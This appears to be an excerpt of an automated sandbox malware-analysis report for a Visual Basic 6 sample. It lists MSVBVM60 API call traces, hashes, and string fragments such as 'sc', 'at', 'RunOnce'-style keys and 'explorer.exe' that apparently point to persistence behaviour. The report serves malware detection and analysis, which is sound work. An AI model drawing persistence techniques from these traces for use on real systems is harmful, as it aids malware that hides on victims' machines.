                                                                                    • API ID: __vba$Free$Move$Copy$List$Error$Bstr$ChkstkUnlock$#516#580#631AnsiFileSystemUnicode$#525#570#648LockOpen$#529#537#600#616BoundsCheckDestructEraseGenerateGet3Get4HresultRedimSeek
                                                                                    • String ID: MR$ RO$Once$at.$system\
                                                                                    • API String ID: 2909355650-3550570743
                                                                                    • Opcode ID: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                    • Instruction ID: 5352e845ad87aaf5050473855ece2fd4f397f64d24d7448873b9de5ca92ad3b4
                                                                                    • Opcode Fuzzy Hash: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                    • Instruction Fuzzy Hash: E0F14F71A00248EFDB04EFA0EE89AEE7775EF48304F108169F606B72A1DB745A45CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041EB20 Relevance: 112.4, APIs: 61, Strings: 3, Instructions: 355COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041EB3E
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,00000000,Function_000032B6), ref: 0041EB6E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000005,00000000,00000002,?,?), ref: 0041EBB0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000040,00004000), ref: 0041EBE8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,FFFFFFFF,?,00004000), ref: 0041EC19
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                      • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                      • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                      • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                      • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                      • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                      • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                      • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                      • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                      • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                    • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ECFC
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                      • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                      • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                      • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                      • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                      • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                      • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                      • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                      • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                      • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                    • #598.MSVBVM60 ref: 0041EE38
                                                                                    • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                    • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                    • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                    • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F022
                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041F042
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                    • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Ansi$#600Chkstk$#537List$#525#598#606#611#616#661#705Construct2CopyExitProcUnicode
                                                                                    • String ID: "\\$at $sc
                                                                                    • API String ID: 318166071-2414866108
                                                                                    • Opcode ID: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                    • Instruction ID: eba9ca47820d788d97438d3d91098e027868d298501ab0f7648888b7b33149ee
                                                                                    • Opcode Fuzzy Hash: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                    • Instruction Fuzzy Hash: 01F12E71900248EFDB14DFA0DE49BDEBBB4FB48305F1081AAE506B72A0DB745A89CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040502A Relevance: 108.9, APIs: 55, Strings: 7, Instructions: 415COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040F89E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040F8E5
                                                                                      • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                      • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040F95B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F966
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F980
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F98B
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F9A6
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040F9C2
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9CD
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040F9E6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9F1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040FA0C
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040FA7B
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040FAA3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040FAAE
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040FABD
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 0040FAD1
                                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040FADC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB0F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040FB2A
                                                                                    • __vbaNew.MSVBVM60(004075DC), ref: 0040FB3C
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB47
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB7A
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040FB95
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040FBC0
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040FBDA
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040FBE1
                                                                                    • #529.MSVBVM60(00000008), ref: 0040FBF5
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Copy$Error$ChkstkSystem$AnsiBstrUnicode$List$File$#525#529#570#580#648CheckHresultOpen$#616CastGet3Get4Seek
                                                                                    • String ID: $ MR$ RO$O$Once$Start$at
                                                                                    • API String ID: 3212910503-2307593978
                                                                                    • Opcode ID: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                    • Instruction ID: 65a71e158419679981a83cfad656d767fba14ec0aa04879cc95e73d8581266b7
                                                                                    • Opcode Fuzzy Hash: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                    • Instruction Fuzzy Hash: 8F020D75A00208EFDB14DFA0DE89BDE77B4FB48304F508169E505B72A1DB74AA45CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429830 Relevance: 105.3, APIs: 57, Strings: 3, Instructions: 320COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CB91,00000000), ref: 0042984E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042987B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042988A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,00000000,004032B6), ref: 004298A3
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 004298AE
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,00000000,004032B6), ref: 004298C7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 004298D2
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,000F003F,?,?,?,?,?,?,00000000,004032B6), ref: 004298F2
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,?,00000000,004032B6), ref: 00429906
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,00000000,004032B6), ref: 00429914
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042992C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429962
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429973
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429981
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042998A
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 004299B3
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 004299CA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 004299D9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 004299EA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004299F5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429A05
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429A13
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429A2F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A47
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429A58
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A66
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429A6F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A84
                                                                                    • __vbaSetSystemError.MSVBVM60(80000001,00000000,?,?,?,?,00000000,004032B6), ref: 00429A95
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429AA3
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429AAC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0042999F
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
